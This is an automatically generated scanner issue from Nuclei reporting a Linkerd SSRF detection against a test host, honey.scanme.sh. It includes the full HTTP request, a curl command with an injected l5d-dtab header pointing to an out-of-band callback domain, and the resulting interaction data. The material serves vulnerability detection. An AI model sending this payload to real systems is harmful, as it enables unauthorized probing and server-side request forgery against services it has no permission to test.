mkrs2404 / tickets

Linkerd SSRF detection (linkerd-ssrf-detection) found on honey.scanme.sh #48

Closed mkrs2404 closed 2 months ago

mkrs2404 commented 5 months ago

Details: linkerd-ssrf-detection matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh

Timestamp: Tue Apr 30 19:28:29 +0530 IST 2024

Template Information

| Key | Value |
| --- | --- |
| Name | Linkerd SSRF detection |
| Authors | dudez |
| Tags | ssrf, linkerd, oast, misconfig |
| Severity | high |
| Description | Linkerd is vulnerable to SSRF. |

Request

GET / HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Connection: close
Accept: */*
Accept-Language: en
l5d-dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 335
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:25 GMT

GET / HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
L5d-Dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79

Interaction Data

http Interaction from 67.205.158.113 at coofgv4mjeun8ktjo61gfysun3uufzru4

Interaction Request

GET / HTTP/1.1
Host: coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1

Interaction Response

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.8

<html><head></head><body>4urzfuu3nusyfg16ojtk8nuejm4vgfooc</body></html>

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79' -H 'l5d-dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443' 'https://honey.scanme.sh'

Generated by Nuclei v3.2.5